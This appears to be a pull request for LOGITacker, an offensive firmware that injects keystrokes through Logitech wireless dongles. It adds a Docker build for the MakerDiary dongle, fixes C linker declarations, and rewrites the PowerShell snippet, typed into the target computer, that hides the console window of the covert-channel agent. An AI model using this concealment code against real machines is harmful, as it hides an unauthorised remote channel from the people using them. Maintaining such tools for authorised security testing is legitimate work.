### PR TITLE
Compiler fixes and hidden PowerShell

### DIFF
--- a/Dockerfile.mdk-dongle
+++ b/Dockerfile.mdk-dongle
@@ -1,0 +1,31 @@
+# Dockerfile.mdk-dongle
+
+FROM kalilinux/kali-rolling
+
+WORKDIR /root
+
+# Install toolchain and dependencies
+RUN apt-get update && apt-get -y install wget git gcc-arm-none-eabi unzip sed make python3
+
+# Fetch nRF5 SDK and LOGITacker repo
+RUN wget https://www.nordicsemi.com/-/media/Software-and-other-downloads/SDKs/nRF5/Binaries/nRF5SDK153059ac345.zip \
+    && unzip nRF5SDK153059ac345.zip \
+    && git clone https://github.com/RoganDawes/LOGITacker
+
+# Patch SDK for local toolchain
+RUN sed -i "s#^GNU_INSTALL_ROOT.*#GNU_INSTALL_ROOT ?= /usr/bin/#g" \
+    nRF5_SDK_15.3.0_59ac345/components/toolchain/gcc/Makefile.posix
+
+# Build only the MakerDiary MDK Dongle target
+WORKDIR /root/LOGITacker/mdk-dongle/blank/armgcc
+RUN sed -i "s#^SDK_ROOT.*#SDK_ROOT := /root/nRF5_SDK_15.3.0_59ac345#g" Makefile && make
+
+# Fetch UF2 conversion script
+WORKDIR /root
+RUN wget https://raw.githubusercontent.com/microsoft/uf2/master/utils/uf2conv.py \
+    && wget https://raw.githubusercontent.com/microsoft/uf2/master/utils/uf2families.json
+
+# Create build dir and convert HEX to UF2
+RUN mkdir build \
+    && cp LOGITacker/mdk-dongle/blank/armgcc/_build/logitacker_mdk_dongle.hex build \
+    && python3 uf2conv.py build/logitacker_mdk_dongle.hex -c -f 0xADA52840 -o build/logitacker_mdk_dongle.uf2

--- a/Dockerfile.mdk-dongle
+++ b/Dockerfile.mdk-dongle
@@ -10,7 +10,7 @@ RUN apt-get update && apt-get -y install wget git gcc-arm-none-eabi unzip sed ma
 # Fetch nRF5 SDK and LOGITacker repo
 RUN wget https://www.nordicsemi.com/-/media/Software-and-other-downloads/SDKs/nRF5/Binaries/nRF5SDK153059ac345.zip \
     && unzip nRF5SDK153059ac345.zip \
-    && git clone https://github.com/RoganDawes/LOGITacker
+    && git clone https://github.com/LuemmelSec/LOGITacker
 
 # Patch SDK for local toolchain
 RUN sed -i "s#^GNU_INSTALL_ROOT.*#GNU_INSTALL_ROOT ?= /usr/bin/#g" \

--- a/build_mdk_dongle_firmware.sh
+++ b/build_mdk_dongle_firmware.sh
@@ -1,0 +1,16 @@
+#!/bin/bash
+
+IMAGE_NAME="logitacker-mdk"
+CONTAINER_NAME="logitacker-mdk-container"
+OUTPUT_DIR="$(pwd)/build"
+
+# Build Docker image
+docker build -f Dockerfile.mdk-dongle -t $IMAGE_NAME .
+
+# Create a container and copy the firmware out
+docker create --name $CONTAINER_NAME $IMAGE_NAME
+mkdir -p "$OUTPUT_DIR"
+docker cp $CONTAINER_NAME:/root/build "$OUTPUT_DIR"
+docker rm $CONTAINER_NAME
+
+echo "UF2 file located at: $OUTPUT_DIR/build/logitacker_mdk_dongle.uf2"

--- a/logitacker/logitacker.c
+++ b/logitacker/logitacker.c
@@ -31,6 +31,7 @@
 #include "nrf_log.h"
 #include "logitacker_processor_covert_channel.h"
 
+char g_logitacker_cli_name[32];
 NRF_LOG_MODULE_REGISTER();
 
 APP_TIMER_DEF(m_timer_next_tx_action);

--- a/logitacker/logitacker.h
+++ b/logitacker/logitacker.h
@@ -47,7 +47,7 @@ typedef enum {
     LOGITACKER_MODE_IDLE
 } logitacker_mode_t;
 
-char g_logitacker_cli_name[32];
+extern char g_logitacker_cli_name[32];
 
 uint32_t logitacker_init();
 

--- a/logitacker/logitacker_cli.c
+++ b/logitacker/logitacker_cli.c
@@ -49,9 +49,9 @@ void deploy_covert_channel_script(bool hide) {
     logitacker_script_engine_append_task_delay(2000);
 
     if (hide) {
-        logitacker_script_engine_append_task_type_string("$h=(Get-Process -Id $pid).MainWindowHandle;$ios=[Runtime.InteropServices.HandleRef];$hw=New-Object $ios (1,$h);");
-        logitacker_script_engine_append_task_type_string("$i=New-Object $ios(2,0);(([reflection.assembly]::LoadWithPartialName(\"WindowsBase\")).GetType(\"MS.Win32.UnsafeNativeMethods\"))::SetWindowPos($hw,$i,0,0,100,100,16512)\n");
-        logitacker_script_engine_append_task_delay(500);
+    logitacker_script_engine_append_task_type_string("Add-Type -Namespace Win32 -Name Api -MemberDefinition '[DllImport(\"kernel32.dll\")] public static extern IntPtr GetConsoleWindow();");
+    logitacker_script_engine_append_task_type_string("[DllImport(\"user32.dll\")] public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);'; $h = [Win32.Api]::GetConsoleWindow(); [Win32.Api]::ShowWindow($h, 0);");
+    logitacker_script_engine_append_task_delay(500);
     }
 
     while (strlen(agentscript) >= 128) {

--- a/logitacker/logitacker_processor_covert_channel.c
+++ b/logitacker/logitacker_processor_covert_channel.c
@@ -526,7 +526,7 @@ void processor_covert_channel_esb_handler_func_(logitacker_processor_covert_chan
 
     switch (p_esb_event->evt_id) {
         case NRF_ESB_EVENT_TX_FAILED:
-            NRF_LOG_INFO("COVERT CHANNEL TX_FAIL ... re-transmit");
+            // NRF_LOG_INFO("COVERT CHANNEL TX_FAIL ... re-transmit");
             // retransmit
             nrf_esb_start_tx();
             break;

--- a/logitacker/logitacker_usb.c
+++ b/logitacker/logitacker_usb.c
@@ -14,7 +14,6 @@
 #include "logitacker_script_engine.h"
 #include "logitacker_options.h"
 
-
 NRF_LOG_MODULE_REGISTER();
 
 uint8_t tmp_in_rep_buf[4][LOGITACKER_USB_HID_GENERIC_IN_REPORT_MAXSIZE];

--- a/logitacker/logitacker_usb.h
+++ b/logitacker/logitacker_usb.h
@@ -166,7 +166,7 @@ typedef enum {
 }
 
 
-const app_usbd_hid_generic_t m_app_hid_generic;
+extern const app_usbd_hid_generic_t m_app_hid_generic;
 
 
 // User event handler.


### PR DESCRIPTION
The firmwares would no longer compile due to linker problems and duplicate declarations.
Also the hiding of the PowerShell Window for the covert channel did no longer work - did a complete different approach.
Added a dedicated Docker file to just generate the Maker Diary Dongle FW plus a helper scripts that automates the task.